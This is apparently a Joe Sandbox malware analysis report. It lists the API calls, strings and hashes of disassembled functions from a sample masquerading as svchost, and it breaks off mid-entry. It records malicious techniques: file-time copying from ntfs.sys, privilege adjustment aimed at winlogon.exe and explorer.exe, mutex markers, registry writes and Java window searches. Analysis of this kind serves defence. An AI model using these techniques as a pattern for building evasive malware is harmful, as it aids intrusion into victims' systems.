Instruction ID: 0ccaee5bb5eef121bf02499105de3754658da8f2b413a91fad157d137fb16431
Opcode Fuzzy Hash: 0f724954e1104db53d25ed058d3cccfce3948f48a115a77b501287c6e6e1cb74
Instruction Fuzzy Hash: 7311B631E842916FEB169BB5DC0DF9BBBACEF84751F0446A5F905D3280DB34D610CAA1

Function 02C8EAD0 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

FindWindowW.USER32(SunAwtFrame,02CB83E0), ref: 02C8EAE1
FindWindowW.USER32(SunAwtFrame,02CB8418), ref: 02C8EAF1
FindWindowW.USER32(SunAwtFrame,02CB8448), ref: 02C8EB01
FindWindowW.USER32(SunAwtFrame,02CB8468), ref: 02C8EB11
FindWindowW.USER32(SunAwtDialog,02CB83E0), ref: 02C8EB21
FindWindowW.USER32(SunAwtDialog,02CB8418), ref: 02C8EB31
FindWindowW.USER32(SunAwtDialog,02CB8448), ref: 02C8EB41
FindWindowW.USER32(SunAwtDialog,02CB8468), ref: 02C8EB51

Strings

SunAwtFrame, xrefs: 02C8EADC, 02C8EAEC, 02C8EAFC, 02C8EB0C
SunAwtDialog, xrefs: 02C8EB1C, 02C8EB2C, 02C8EB3C, 02C8EB4C

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FindWindow
String ID: SunAwtDialog$SunAwtFrame
API String ID: 134000473-1757792087
Opcode ID: b201d23f41094976b1edccc0699267d55eb7bd535f81bef550611750ab442811
Instruction ID: 9fae9017ba22f8d1d135ea2ad7290c95713231852abeed899d7bb493b7186d8a
Opcode Fuzzy Hash: b201d23f41094976b1edccc0699267d55eb7bd535f81bef550611750ab442811
Instruction Fuzzy Hash: B1F00D257C532665762232692D32FEA0B8C5D91D8EF058271BA17A3008E6A095424CF9

Function 02C8A318 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
CloseHandle.KERNEL32(00000000), ref: 02C8A35B
PathAddBackslashA.SHLWAPI(82c3181f), ref: 02C8A366
Sleep.KERNEL32(00009C40,82c3181f,ALPHA), ref: 02C8A380
Sleep.KERNEL32(00000064), ref: 02C8A386

Strings

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02C8A320
82c3181f, xrefs: 02C8A361, 02C8A371
ALPHA, xrefs: 02C8A36C
P0#v, xrefs: 02C8A335

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 82c3181f$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v
API String ID: 4280258085-3298862243
Opcode ID: 7614bdbaed2c3d353d408fa2d3712f5e85987458b25ca0920f5b06845d17d4d4
Instruction ID: de14a1f6760cce9f69a8307fc09907b038dd5766c2de6a09dfb1e88f9bf87ab6
Opcode Fuzzy Hash: 7614bdbaed2c3d353d408fa2d3712f5e85987458b25ca0920f5b06845d17d4d4
Instruction Fuzzy Hash: FCF0A7319C47906AF7237B619C0EB5A77DC7F89B19F008519F94A93180D7B4C5048B67

Function 02C918E8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
ReleaseMutex.KERNEL32(00000000), ref: 02C91905
GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
CloseHandle.KERNEL32(00000000), ref: 02C9192B
PathAddBackslashA.SHLWAPI(82C31CB5), ref: 02C91936
Sleep.KERNEL32(00009C40,82C31CB5,RFK), ref: 02C91950
Sleep.KERNEL32(00000064), ref: 02C91956

Strings

RFK, xrefs: 02C9193C
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C918F0
P0#v, xrefs: 02C91905
82C31CB5, xrefs: 02C91931, 02C91941

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 82C31CB5$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RFK
API String ID: 4280258085-134197944
Opcode ID: 7d62ca8156109f4692c760b78fded2693496623159fffe5dc9672ef756f99eff
Instruction ID: 004c4aa86e14d2b73aa9941bbbb29204516ae7021b9d9f6747053e188e05d585
Opcode Fuzzy Hash: 7d62ca8156109f4692c760b78fded2693496623159fffe5dc9672ef756f99eff
Instruction Fuzzy Hash: 14F082309C83926EF6225B619C2EF5E37DD6F45B09F098568F90AA2140D7F081158B67

Function 02C8E8A8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
PathAddBackslashA.SHLWAPI(82c319a5), ref: 02C8E8F6
Sleep.KERNEL32(00009C40,82c319a5,HANDY), ref: 02C8E910
Sleep.KERNEL32(00000064), ref: 02C8E916

Strings

HANDY, xrefs: 02C8E8FC
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C8E8B0
82c319a5, xrefs: 02C8E8F1, 02C8E901
P0#v, xrefs: 02C8E8C5

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 82c319a5$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v
API String ID: 4280258085-4110396391
Opcode ID: d9c0ffe1b21f23b5c948dd390bc40a336df9ccfcf61badfca65350155e741a86
Instruction ID: 50f4a4625df6a55b3e4d748a1960cbe6f7a8e024a5b950663cb031bbaddc7270
Opcode Fuzzy Hash: d9c0ffe1b21f23b5c948dd390bc40a336df9ccfcf61badfca65350155e741a86
Instruction Fuzzy Hash: BEF082309C43516AF362AB608C0EB5E37DC6F49B0DF048554F906A2081DBB481108B6B

Function 02C7F0C0 Relevance: 16.6, APIs: 11, Instructions: 115memorynetworkCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C7F114
GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
HeapValidate.KERNEL32(00000000), ref: 02C7F12F
GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
HeapFree.KERNEL32(00000000), ref: 02C7F13F
InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
HeapAlloc.KERNEL32(00000000), ref: 02C7F180
memset.MSVCRT ref: 02C7F190
memset.MSVCRT ref: 02C7F1D5
memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 02C7F1E9

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
String ID:
API String ID: 3911349929-0
Opcode ID: 3b47ffc03df7bccae93ebc883bf1e46a15468ce7319b93bfc744b909056eae01
Instruction ID: 7350d4f0af38a8bac6b638da8aa0a5de28e76fc12fb81255f84488d85783ebeb
Opcode Fuzzy Hash: 3b47ffc03df7bccae93ebc883bf1e46a15468ce7319b93bfc744b909056eae01
Instruction Fuzzy Hash: C1418E72A40305AFDB21DFA8DC84F5AB7F8EF84710F008959E94697680DB71EA14CBE0

Function 02C7E2E0 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E324
HeapAlloc.KERNEL32(00000000), ref: 02C7E32B
memset.MSVCRT ref: 02C7E33B
memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7E346
GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02CB36B4,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E40E
HeapValidate.KERNEL32(00000000), ref: 02C7E415
GetProcessHeap.KERNEL32(?,00000000), ref: 02C7E421
HeapFree.KERNEL32(00000000), ref: 02C7E428
memcpy.MSVCRT(?,00000000,?,?,?,?,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E44E
GetProcessHeap.KERNEL32(00000000,00000000,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E47A
HeapValidate.KERNEL32(00000000), ref: 02C7E47D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E48A
HeapFree.KERNEL32(00000000), ref: 02C7E48D

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidatememcpy$Allocmemset
String ID:
API String ID: 1948005343-0
Opcode ID: a40c66fdaf0112aab8bbe067be471c51554bc826174dd919857f03d9f0225b0f
Instruction ID: 81e6e9af924028ffee4f43b75ffaa7436fad0c47c8715583036e619129a02199
Opcode Fuzzy Hash: a40c66fdaf0112aab8bbe067be471c51554bc826174dd919857f03d9f0225b0f
Instruction Fuzzy Hash: 5261A673B002199BDB11DF99D884AAAB7A9FF88714F0486A5FD0997340D771EE11CBE0

Function 02C76B50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C76B83
memset.MSVCRT ref: 02C76B9B
RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,7622F380), ref: 02C76BBC
RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,7622F380), ref: 02C76BE2
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,7622F380), ref: 02C76C6D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,7622F380), ref: 02C76C74
memset.MSVCRT ref: 02C76C83
RegCloseKey.ADVAPI32(?,?,?,?,?,?,7622F380), ref: 02C76CB3

Strings

software\microsoft, xrefs: 02C76BB0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValue
String ID: software\microsoft
API String ID: 4158279268-3673152959
Opcode ID: 90201f7ca9359d800aed87972a28eb2b708b985beff4ee246ce9ad195b8c8ef2
Instruction ID: f00bfaf2064b4f9c923215d3669394f2093518c029f08b413f135ced1ddba1f1
Opcode Fuzzy Hash: 90201f7ca9359d800aed87972a28eb2b708b985beff4ee246ce9ad195b8c8ef2
Instruction Fuzzy Hash: 77410571E4055DAFEB15DB749C88AEAB7ADEF98304F1045A8E549D7140E3708F498BA0

Function 004013C0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004013D8
memset.MSVCRT ref: 004013FE
lstrcpynA.KERNEL32(?,00402BDF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401416
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401439
GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040145A
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401467
GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040147E
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040148B

Strings

D, xrefs: 00401432

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
String ID: D
API String ID: 2248944234-2746444292
Opcode ID: c48a064c7529e876acfcd4e90bb1c684e8bfef1ce1d99d06041c7af5d8c72a1f
Instruction ID: 09676c1f46593a06cd44afd8140421a4ba04e6465ccbd83babddadcd264a60ad
Opcode Fuzzy Hash: c48a064c7529e876acfcd4e90bb1c684e8bfef1ce1d99d06041c7af5d8c72a1f
Instruction Fuzzy Hash: 862165B1A002196FDB10DFE4DD85AEF7BBCAB44354F00817AFA08F6291D6349A448BB5

Function 00401B60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401B85
GetFileTime.KERNEL32(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?,?,?), ref: 00401B9F
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401BB5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401BC6
CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402B87,?), ref: 00401BE2
SetFileTime.KERNEL32(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?), ref: 00401BF8
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401C0E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401C1F

Strings

\\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401B80

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FileHandle$CloseCreateInformationTime
String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
API String ID: 1046229350-2760794270
Opcode ID: a3513c22781d9b883142d906c5a388a7ca545872d8ccd4c85f932c2de55d5d3d
Instruction ID: 5c288fe5b10a83830543158496eb663db1d1ba801f64cc380cadfe311b19cddd
Opcode Fuzzy Hash: a3513c22781d9b883142d906c5a388a7ca545872d8ccd4c85f932c2de55d5d3d
Instruction Fuzzy Hash: 3721D7725402187BE7219B90DD09FEFBB7CAF84710F108225FF11761D0E774964586A8

Function 02C823A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 39registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C823A7
GetTickCount.KERNEL32 ref: 02C823B9
RegOpenKeyExA.ADVAPI32(user!899552!E7E3D226,software\microsoft,00000000,00000102,02C84A6F,?,02C84A6F), ref: 02C823D3
RegSetValueExA.ADVAPI32(02C84A6F,7D2DE753a,00000000,00000004,00000004,00000004,02C84A6F), ref: 02C823F0
RegFlushKey.ADVAPI32(?), ref: 02C823FA
RegCloseKey.ADVAPI32(?), ref: 02C82404

Strings

7D2DE753a, xrefs: 02C823EA
user!899552!E7E3D226, xrefs: 02C823A6, 02C823D2
software\microsoft, xrefs: 02C823CD

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: AdminCloseCountFlushOpenTickUserValue
String ID: 7D2DE753a$user!899552!E7E3D226$software\microsoft
API String ID: 287100044-2713755444
Opcode ID: 8f6cdfb92d119de1b8484a46a2feac68937d8403caffc9ce92df36176a82f031
Instruction ID: 3b1379d1164551cb229a6ca7f0a1ba3dadd87f54f5e1a5cc4ea733abf2b871cf
Opcode Fuzzy Hash: 8f6cdfb92d119de1b8484a46a2feac68937d8403caffc9ce92df36176a82f031
Instruction Fuzzy Hash: 60F03C79D80258FBE701DBA0AC4AF9A773CAF04601F104695FE06A3180D670AA159BA5

Function 004027B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON

Download Yara Rule

APIs

GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20112,?,?,00402D7C), ref: 004027B9
GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20112), ref: 004027CA
IsUserAnAdmin.SHELL32 ref: 004027D6
RtlAdjustPrivilege.NTDLL ref: 004027E6
IsUserAnAdmin.SHELL32 ref: 004027EC

Strings

Fri Jun 17 05:52:09 20112, xrefs: 004027B4, 004027C5
explorer.exe, xrefs: 004027F8, 004027FD
Pn7w, xrefs: 004027E6
winlogon.exe, xrefs: 004027F1

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AdminAtomGlobalUser$AdjustFindPrivilege
String ID: Fri Jun 17 05:52:09 20112$Pn7w$explorer.exe$winlogon.exe
API String ID: 3001685711-3521715275
Opcode ID: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
Instruction ID: 466661b1ea48edbd92509d7abf6a2a5afa49196c9ec5a44dbf6f5976db38d1d5
Opcode Fuzzy Hash: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
Instruction Fuzzy Hash: 6AF08CB460020566EA5077E1AE0AB6B3A1CAB84B90F104137FF00B72E0EAB8DC0046FC

Function 02C7EB10 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000000), ref: 02C7EBEA
memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 02C7EC9A
_snprintf.MSVCRT ref: 02C7ECB6
memcpy.MSVCRT(?,?,?), ref: 02C7ECC5
memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 02C7ED1C
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02C7ED3D
memcpy.MSVCRT(?,?,?), ref: 02C7EDBF

Strings

Content-Length, xrefs: 02C7ED03
%x, xrefs: 02C7ECAE
0, xrefs: 02C7ECCA

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memcpy$_snprintf
String ID: 0$%x$Content-Length
API String ID: 4125937431-3838797520
Opcode ID: 33af21bc4f9b3d582628b9cae9a83cdf2460a5ddc0ce9f7ac8dce1af683e3ede
Instruction ID: 52476407a82d41700fb536315d3cc800fccaa62d03a276dfe78a9bb67cd9490d
Opcode Fuzzy Hash: 33af21bc4f9b3d582628b9cae9a83cdf2460a5ddc0ce9f7ac8dce1af683e3ede
Instruction Fuzzy Hash: 87916FB2600746AFC714DF68D88496AB7E9FF98314F048B69F82987644E770E914CBE1

Function 02C750D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110synchronizationCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75110
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7513C
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75163
GetLastError.KERNEL32 ref: 02C75184
WaitForSingleObject.KERNEL32(00000334,000003E8), ref: 02C751B4
ReleaseMutex.KERNEL32(00000334), ref: 02C751D5
SetLastError.KERNEL32(?), ref: 02C751EE

Strings

P0#v, xrefs: 02C751D5

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
String ID: P0#v
API String ID: 2971961948-3387790918
Opcode ID: 70f9fc3143bf534cca684f0e4e89fc85c5a61feea77cab146b802c1c70a26e28
Instruction ID: 624dc36d533c102a67ddf76a704838ae94d69d864442ab1e9e144c3c66c6519f
Opcode Fuzzy Hash: 70f9fc3143bf534cca684f0e4e89fc85c5a61feea77cab146b802c1c70a26e28
Instruction Fuzzy Hash: 8B41B975E40208EFDB40DFA9D884AEDBBF5FB88351F51456AE904E7200E774AA01CF90

Function 02C75200 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02C75218
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75249
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75275
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7529C
WaitForSingleObject.KERNEL32(00000334,000003E8), ref: 02C752CD
ReleaseMutex.KERNEL32(00000334), ref: 02C752EE
SetLastError.KERNEL32(?), ref: 02C752F8

Strings

P0#v, xrefs: 02C752EE

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
String ID: P0#v
API String ID: 2971961948-3387790918
Opcode ID: ce913c20827457bea48ee1bafbd5fd172c027c311be6c2699a490eb7730b090c
Instruction ID: 30c5bc5ae0f3d323f0229e5c14f4cc7f50c54d2b51a2aeee4670010bc99a5d1c
Opcode Fuzzy Hash: ce913c20827457bea48ee1bafbd5fd172c027c311be6c2699a490eb7730b090c
Instruction Fuzzy Hash: CB31B5B5E40258AFDB40DFE9D884ADDBBF9FB48310F50856AE918E7240E7749A11CF90

Function 02C8AB20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92threadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,\private\), ref: 02C8AB49
CreateThread.KERNEL32(00000000,00000000,02C8AAF0,00000000,00000000,00000000), ref: 02C8AB96
StrStrIA.SHLWAPI(?,\public\), ref: 02C8ABAE
CreateThread.KERNEL32(00000000,00000000,02C8AAD0,00000000,00000000,00000000), ref: 02C8ABF2
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AC0A
CloseHandle.KERNEL32(00000000), ref: 02C8AC1B

Strings

\private\, xrefs: 02C8AB43
\public\, xrefs: 02C8ABA8

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CreateHandleThread$CloseInformation
String ID: \private\$\public\
API String ID: 677819612-281496920
Opcode ID: 0a4440110d42e8da86999d1edf3a9dac1824afa8cb82750815a93b5b3e5396a2
Instruction ID: 459944f8d6a44322f75390ca40d196e11bb48cfee441a594600555a0848a885f
Opcode Fuzzy Hash: 0a4440110d42e8da86999d1edf3a9dac1824afa8cb82750815a93b5b3e5396a2
Instruction Fuzzy Hash: 493109309817149FE7216B14EC09BA67758DF81B0DF14C65BEA055B2C0C7B59648DFD4

Function 02C7D200 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
GetLastActivePopup.USER32(?), ref: 02C7D229
GetWindow.USER32(00000000,00000005), ref: 02C7D243
GetWindow.USER32(00000000), ref: 02C7D246
GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
GetWindow.USER32(00000000,00000004), ref: 02C7D265
GetWindow.USER32(00000000,00000003), ref: 02C7D29E

Strings

<, xrefs: 02C7D255

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$ActiveInfoLastLongPopup
String ID: <
API String ID: 3748940024-4251816714
Opcode ID: 6566fcbd06473202438ac9c479076b65a869ccce2ce16732eb24cbd94813201e
Instruction ID: ad51b8ab07b6a8a0a47f95f8dc24954f2c3c838c14de4cce43531096e268ba51
Opcode Fuzzy Hash: 6566fcbd06473202438ac9c479076b65a869ccce2ce16732eb24cbd94813201e
Instruction Fuzzy Hash: 2B110B71A4061516DB22A9699CC9FAFBB5CEFD1354F040665FE02F3180DB60DE428BA0

Function 02C7C910 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 53synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02C7C8E0,00000000,00000000,00000000), ref: 02C7C924
